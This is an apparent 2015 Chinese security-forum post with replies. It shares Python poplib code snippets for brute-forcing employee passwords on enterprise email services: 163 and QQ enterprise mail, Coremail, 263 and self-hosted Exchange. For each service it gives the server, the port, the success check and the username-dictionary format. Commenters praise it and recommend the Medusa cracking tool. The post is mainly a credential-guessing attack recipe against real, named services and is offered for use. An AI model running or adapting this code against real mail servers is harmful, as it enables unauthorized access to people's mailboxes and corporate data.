整理的各种企业邮箱爆破注意点

整理的各种企业邮箱爆破注意点

her0ma | 2015-05-14 17:36

爆破过很多类型的企业邮箱，大体都是差不多的，有一些注意的点贴出来、

163 企业邮箱，关键代码：

server = "pop.qiye.163.com"
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    pring user,passwd

用户字典文件需要@domain.com，类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

QQ企业邮箱，关键代码：

server = "pop.exmail.qq.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth =="+OK":
    print user,passwd

用户字典文件需要@domain.com，类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

Coremail,关键代码：

server = "mail.domain.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth =="+OK":
    print user,passwd

用户字典不需要域名后缀，类似zhangsan、lisi、wangwu这样。

236邮箱，关键代码：

server = "mail.domain.com"
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    print user,passwd

用户字典文件需要@domain.com，类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

自己搭建的exchange邮箱，关键代码：

server = "mail.domain.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    print user,passwd

用户字典不需要域名后缀，类似zhangsan、lisi、wangwu这样。

关键区别是几种邮箱登录成功回显略有不同，比如exchange跟QQ企业邮箱就是不同的；

是以poplib模块举例的，可以使用python的imaplib来支持imap协议；

根据邮箱服务器开放的pop3或pop3s端口来调整使用poplib.POP3()方法还是poplib.POP3_SSL()。

[原文地址]

各种吐槽：

1#

暗羽 (喵喵喵喵喵喵喵喵) | 2015-05-14 17:38

~\(≧▽≦)/~

2#

孤独行者 (一位孤独的路人) | 2015-05-14 17:38

收藏了

3#

小威 (脑残已经占领了各个区域) | 2015-05-14 17:41

管你要了这么久也不给我，我自己挨个挖的

4#

啊L川 (我想起那天下午夕阳下的奔跑,那是我逝去的青春...) | 2015-05-14 17:50

司马大牛

5#

我是壮丁 | 2015-05-14 17:52

为啥不直接用美杜莎？

6#

her0ma | 2015-05-14 17:53

@我是壮丁 美杜莎是啥？

7#

胡小树 | 2015-05-14 17:56

@小威 你魅力不够。哈哈

8#

小胖子 (z7y首席代言人，园长的表哥...) | 2015-05-14 18:02

为啥不直接用medusa？

9#

_Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2015-05-14 18:03

@我是壮丁 @her0ma medousa，苏哥哥总是不说正常话- -。

10#

我是壮丁 | 2015-05-14 18:06

@her0ma @_Thorns 是我忘记怎么打那几个单词了。。。。

11#

her0ma | 2015-05-14 18:12

@小胖子 不知道有这种神器……

12#

寂寞的瘦子 (坚持一切语言转汇编的基本理论) | 2015-05-14 18:14

@her0ma pring user,passwd 撸多了，司马

13#

her0ma | 2015-05-14 18:15

@寂寞的瘦子 啊 没注意，我修改下！

14#

乌云小秘书 (第1.绝对不意气用事!第2.绝对不漏判任何一件坏事) | 2015-05-14 18:16

没想到撸主竟然把思路发出来了，还想慢慢玩的······

已奖励小红花：）

15#

sql (男：哦？ 女：否) | 2015-05-14 18:22

众测很有用

16#

D＆G | 2015-05-14 19:00

qq企业邮箱也可以爆破么

17#

her0ma | 2015-05-14 19:03

@D＆G 可以的

18#

bey0nd | 2015-05-14 20:49

@her0ma 直接上脚本呀~

19#

小手冰凉 | 2015-05-14 21:01

@her0ma 专注爆破30年啊..........

20#

ACGT | 2015-05-14 21:13

263不用爆破

21#

牛肉包子 (这个包子，牛肉馅。) | 2015-05-14 22:08

@乌云小秘书 小秘书也撸站？

22#

Sogili (.) 长短短 (.) | 2015-05-15 00:23

顶

核攻击 () | 2015-05-15 09:32

mark..